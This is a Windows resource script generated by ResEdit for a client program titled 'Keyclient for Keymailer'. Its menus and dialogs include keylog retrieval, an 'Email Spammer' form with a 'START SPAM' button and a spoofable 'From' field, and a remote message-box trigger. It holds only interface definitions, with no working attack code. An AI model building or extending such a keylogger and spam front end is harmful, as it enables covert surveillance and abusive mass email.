// Generated by ResEdit 1.5.11
// Copyright (C) 2006-2012
// http://www.resedit.net

#include <windows.h>
#include <commctrl.h>
#include <richedit.h>
#include "resource.h"




//
// Menu resources
//
LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDR_MYMENU MENU
{
    POPUP "&File"
    {
        MENUITEM "E&XIT", ID_FILE_EXIT
        MENUITEM "Retrieve Keylog and Save as...", IDM_RETRIEVE_KEYLOG_AND_SAVE_AS___1
        MENUITEM "Email Spammer", IDM_EMAIL_SPAMMER
    }
    POPUP ""
    {
    }
    POPUP "About"
    {
        MENUITEM "About", IDM_ABOUT1
        MENUITEM "Contact the Author", IDM_CONTACT
    }
}



//
// Dialog resources
//
LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDD_ABOUT DIALOG 0, 0, 263, 102
STYLE DS_MODALFRAME | DS_SETFONT | WS_CAPTION | WS_POPUP | WS_SYSMENU
CAPTION "About Box"
FONT 8, "MS Sans Serif"
{
    DEFPUSHBUTTON   "&OK,", IDOK, 179, 34, 50, 14
    PUSHBUTTON      "&CANCEL", IDCANCEL, 179, 54, 50, 14
    GROUPBOX        "About this program...", IDC_STATIC, 7, 7, 245, 86
    CTEXT           "Keyclient for Keymailer. Written by Kelvin Silva, and HF community :3", IDC_STATIC, 16, 18, 217, 8, SS_CENTER
    LTEXT           "Project start date: Feb 20, 2013", IDC_STATIC, 14, 34, 100, 8, SS_LEFT
    LTEXT           "Libraries used:\nwindows.h\nwinsock2.h", IDC_STATIC, 13, 57, 46, 24, SS_LEFT
}



LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDD_EMAILME DIALOG 0, 0, 231, 242
STYLE DS_MODALFRAME | DS_SETFONT | WS_CAPTION | WS_POPUP
EXSTYLE WS_EX_TOOLWINDOW
CAPTION "Email the Author"
FONT 8, "MS Sans Serif"
{
    PUSHBUTTON      "Send Email", IDC_PRESS, 19, 210, 70, 14
    PUSHBUTTON      "&CANCEL", IDC_CANCELMAIL, 149, 210, 50, 14
    EDITTEXT        IDC_FROM, 17, 49, 179, 17, ES_AUTOHSCROLL
    EDITTEXT        IDC_MESSAGE, 17, 120, 180, 75, ES_AUTOHSCROLL
    LTEXT           "Your email", IDC_STATIC, 19, 36, 34, 8, SS_LEFT
    LTEXT           "Enter Message:", IDC_STATIC, 17, 107, 50, 8, SS_LEFT
    EDITTEXT        IDC_SUBJECT, 17, 84, 178, 18, ES_AUTOHSCROLL
    LTEXT           "Subject", IDC_STATIC, 17, 71, 25, 8, SS_LEFT
    LTEXT           "Destination: ", IDC_STATIC, 19, 7, 40, 8, SS_LEFT
    EDITTEXT        IDC_DEST, 18, 20, 181, 14
    PUSHBUTTON      "Info", IDC_BUTTON1, 94, 210, 50, 14
}



LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDD_ESPAMMER DIALOG 0, 0, 231, 344
STYLE DS_MODALFRAME | DS_SETFONT | WS_CAPTION | WS_POPUP
CAPTION "Email Spammer"
FONT 8, "Ms Shell Dlg"
{
    LTEXT           "Your MANDRILL User Account Base 64 Encoded", IDC_STATIC, 17, 27, 158, 8, SS_LEFT
    EDITTEXT        IDC_EDIT1, 17, 40, 196, 13, ES_AUTOHSCROLL
    LTEXT           "MANDRILL Api Key Base64 Encoded", IDC_STATIC, 17, 58, 120, 8, SS_LEFT
    EDITTEXT        IDC_EDIT2, 17, 71, 196, 14, ES_AUTOHSCROLL
    LTEXT           "Email Destination", IDC_STATIC, 17, 90, 55, 8, SS_LEFT
    EDITTEXT        IDC_EDIT3, 17, 103, 196, 14, ES_AUTOHSCROLL
    LTEXT           "Email Header From: ", IDC_STATIC, 17, 165, 64, 8, SS_LEFT
    EDITTEXT        IDC_EDIT4, 17, 178, 196, 15, ES_AUTOHSCROLL
    LTEXT           "Subject", IDC_STATIC, 17, 198, 25, 8, SS_LEFT
    EDITTEXT        IDC_EDIT5, 17, 211, 196, 13, ES_AUTOHSCROLL
    LTEXT           "Message", IDC_STATIC, 17, 229, 30, 8, SS_LEFT
    EDITTEXT        IDC_EDIT6, 17, 242, 196, 88, ES_AUTOHSCROLL
    LTEXT           "Number Of Emails to Send (As allowed per mandrill account)", IDC_STATIC, 17, 122, 189, 8, SS_LEFT
    EDITTEXT        IDC_EDIT7, 17, 135, 52, 12, ES_AUTOHSCROLL
    LTEXT           "Send email every", IDC_STATIC, 17, 152, 55, 8, SS_LEFT
    EDITTEXT        IDC_EDIT8, 77, 147, 28, 13, ES_AUTOHSCROLL
    PUSHBUTTON      "Exit", IDC_EMAILEXIT, 17, 5, 51, 14
    PUSHBUTTON      "START SPAM", IDC_BUTTON2, 73, 4, 76, 15
    PUSHBUTTON      "More Info", IDC_BUTTON3, 154, 4, 59, 14
    LTEXT           "minutes", IDC_STATIC, 110, 152, 25, 8, SS_LEFT
}



LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDD_MSGBOXTRIG DIALOG 0, 0, 203, 152
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_CAPTION | WS_VISIBLE | WS_POPUP | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "Ms Shell Dlg"
{
    DEFPUSHBUTTON   "SEND", ID_TRIGBOXSEND, 93, 5, 44, 14
    PUSHBUTTON      "Cancel", ID_MSGBOXTRIGCANCEL, 142, 5, 50, 14
    LTEXT           "Title ", 65535, 10, 8, 16, 8, SS_LEFT
    LTEXT           "Message", 1, 10, 40, 30, 8, SS_LEFT
    EDITTEXT        ID_TITLEMSGBOXTRIG, 10, 21, 182, 14, ES_AUTOHSCROLL
    EDITTEXT        ID_MESSAGEMSGBOXTRIG, 10, 53, 182, 14, ES_AUTOHSCROLL
    COMBOBOX        ID_MSGBOXTRIGSTYLE, 93, 72, 99, 62, WS_GROUP | CBS_DROPDOWNLIST | CBS_HASSTRINGS
    LTEXT           "Message Box Style------->", 4, 10, 75, 79, 8, SS_LEFT
    LTEXT           "Message Box Icon-------->", IDC_STATIC, 10, 95, 80, 8, SS_LEFT
    COMBOBOX        ID_MSGBOXICONCOMBO, 93, 95, 99, 57, WS_GROUP | CBS_DROPDOWNLIST | CBS_HASSTRINGS
}



//
// Icon resources
//
LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
IDI_MYICON         ICON           "menu_one.ico"
